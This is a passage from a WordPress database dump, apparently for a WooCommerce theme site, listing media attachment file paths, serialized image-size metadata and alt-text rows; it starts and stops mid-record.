;}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:21:\"product-6-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:21:\"product-6-800x550.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:21:\"product-6-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:21:\"product-6-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:21:\"product-6-600x600.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:600;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:21:\"product-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(793,864,'_wp_attached_file','2018/01/h5-img-6.jpg'),(794,864,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:294;s:6:\"height\";i:450;s:4:\"file\";s:20:\"2018/01/h5-img-6.jpg\";s:5:\"sizes\";a:8:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:20:\"h5-img-6-294x300.jpg\";s:5:\"width\";i:294;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:20:\"h5-img-6-196x300.jpg\";s:5:\"width\";i:196;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-6-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:20:\"h5-img-6-294x300.jpg\";s:5:\"width\";i:294;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:20:\"h5-img-6-294x240.jpg\";s:5:\"width\";i:294;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:20:\"h5-img-6-294x300.jpg\";s:5:\"width\";i:294;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:20:\"h5-img-6-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(795,3231,'_wp_attachment_image_alt','o'),(796,3232,'_wp_attachment_image_alt',''),(797,3234,'_wp_attachment_image_alt',''),(798,3235,'_wp_attachment_image_alt','o'),(799,4232,'_wp_attachment_context','site-icon'),(800,3236,'_wp_attachment_image_alt',''),(801,4234,'_wp_attachment_image_alt','a'),(802,4238,'_wp_attached_file','2018/03/landing-home2-img-1.jpg'),(803,4238,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:31:\"2018/03/landing-home2-img-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"landing-home2-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"landing-home2-img-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"landing-home2-img-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(804,4239,'_wp_attached_file','2018/03/landing-home2-img-1-1.jpg'),(805,4239,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:472;s:4:\"file\";s:33:\"2018/03/landing-home2-img-1-1.jpg\";s:5:\"sizes\";a:13:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"landing-home2-img-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-300x177.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:177;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-768x453.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:453;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-550x472.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:472;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"landing-home2-img-1-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-600x354.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:354;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"landing-home2-img-1-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(806,3238,'_wp_attached_file','2018/02/h3-slide1-graphic3.png'),(807,3238,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:120;s:6:\"height\";i:108;s:4:\"file\";s:30:\"2018/02/h3-slide1-graphic3.png\";s:5:\"sizes\";a:2:{s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:30:\"h3-slide1-graphic3-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(808,863,'_wp_attachment_image_alt','o'),(809,864,'_wp_attachment_image_alt','o'),(810,839,'_wp_attachment_image_alt','a'),(811,861,'_wp_attachment_image_alt','o'),(812,862,'_wp_attachment_image_alt','o'),(813,863,'_wp_attachment_image_alt','o'),(814,864,'_wp_attachment_image_alt','o'),(815,3238,'_wp_attachment_image_alt','o'),(816,904,'_wp_attached_file','2018/01/h5-slider-graphic-2.jpg'),(817,904,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:800;s:4:\"file\";s:31:\"2018/01/h5-slider-graphic-2.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:31:\"h5-slider-graphic-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-600x250.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-300x125.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-2-1024x427.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-768x320.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-2-1536x640.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-2-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:32:\"h5-slider-graphic-2-1100x800.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:31:\"h5-slider-graphic-2-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-600x250.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:31:\"h5-slider-graphic-2-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(818,4240,'_wp_attached_file','2018/01/h5-slider-graphic-2-1.jpg'),(819,4240,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:800;s:4:\"file\";s:33:\"2018/01/h5-slider-graphic-2-1.jpg\";s:5:\"sizes\";a:17:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-600x250.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-300x125.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:125;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:34:\"h5-slider-graphic-2-1-1024x427.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:427;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-768x320.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:320;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-630x300.jpg\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-300x240.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:34:\"h5-slider-graphic-2-1-1536x640.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:640;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-550x550.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:34:\"h5-slider-graphic-2-1-1100x550.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-550x800.jpg\";s:5:\"width\";i:550;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:34:\"h5-slider-graphic-2-1-1100x800.jpg\";s:5:\"width\";i:1100;s:6:\"height\";i:800;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-600x250.jpg\";s:5:\"width\";i:600;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:33:\"h5-slider-graphic-2-1-100x100.jpg\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(820,864,'_wp_attachment_image_alt','o'),(821,904,'_wp_attachment_image_alt','o'),(822,3261,'_wp_attached_file','2018/02/h3-slide2-graphic1-1.png'),(823,3261,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:912;s:6:\"height\";i:718;s:4:\"file\";s:32:\"2018/02/h3-slide2-graphic1-1.png\";s:5:\"sizes\";a:14:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-600x472.png\";s:5:\"width\";i:600;s:6:\"height\";i:472;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-300x236.png\";s:5:\"width\";i:300;s:6:\"height\";i:236;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-768x605.png\";s:5:\"width\";i:768;s:6:\"height\";i:605;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-912x550.png\";s:5:\"width\";i:912;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-550x718.png\";s:5:\"width\";i:550;s:6:\"height\";i:718;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-600x472.png\";s:5:\"width\";i:600;s:6:\"height\";i:472;s:9:\"mime-type\";s:9:\"image/png\";}s:14:\"shop_thumbnail\";a:4:{s:4:\"file\";s:32:\"h3-slide2-graphic1-1-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(824,154,'_wp_attached_file','2018/01/about-us-img-2.png'),(825,154,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1157;s:6:\"height\";i:671;s:4:\"file\";s:26:\"2018/01/about-us-img-2.png\";s:5:\"sizes\";a:16:{s:21:\"woocommerce_thumbnail\";a:5:{s:4:\"file\";s:26:\"about-us-img-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:29:\"woocommerce_gallery_thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-100x100.png\";s:5:\"width\";i:100;s:6:\"height\";i:100;s:9:\"mime-type\";s:9:\"image/png\";}s:18:\"woocommerce_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-600x348.png\";s:5:\"width\";i:600;s:6:\"height\";i:348;s:9:\"mime-type\";s:9:\"image/png\";}s:6:\"medium\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-300x174.png\";s:5:\"width\";i:300;s:6:\"height\";i:174;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:27:\"about-us-img-2-1024x594.png\";s:5:\"width\";i:1024;s:6:\"height\";i:594;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-768x445.png\";s:5:\"width\";i:768;s:6:\"height\";i:445;s:9:\"mime-type\";s:9:\"image/png\";}s:16:\"event-post-thumb\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-630x300.png\";s:5:\"width\";i:630;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:20:\"event-post-thumb-box\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-300x240.png\";s:5:\"width\";i:300;s:6:\"height\";i:240;s:9:\"mime-type\";s:9:\"image/png\";}s:23:\"succulents_qodef_square\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-550x550.png\";s:5:\"width\";i:550;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:26:\"succulents_qodef_landscape\";a:4:{s:4:\"file\";s:27:\"about-us-img-2-1100x550.png\";s:5:\"width\";i:1100;s:6:\"height\";i:550;s:9:\"mime-type\";s:9:\"image/png\";}s:25:\"succulents_qodef_portrait\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-550x671.png\";s:5:\"width\";i:550;s:6:\"height\";i:671;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"succulents_qodef_huge\";a:4:{s:4:\"file\";s:27:\"about-us-img-2-1100x671.png\";s:5:\"width\";i:1100;s:6:\"height\";i:671;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"shop_catalog\";a:5:{s:4:\"file\";s:26:\"about-us-img-2-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";s:9:\"uncropped\";b:0;}s:11:\"shop_single\";a:4:{s:4:\"file\";s:26:\"about-us-img-2-600x348.png\";s:5:\"width\";i:600;s:6:\"height\";i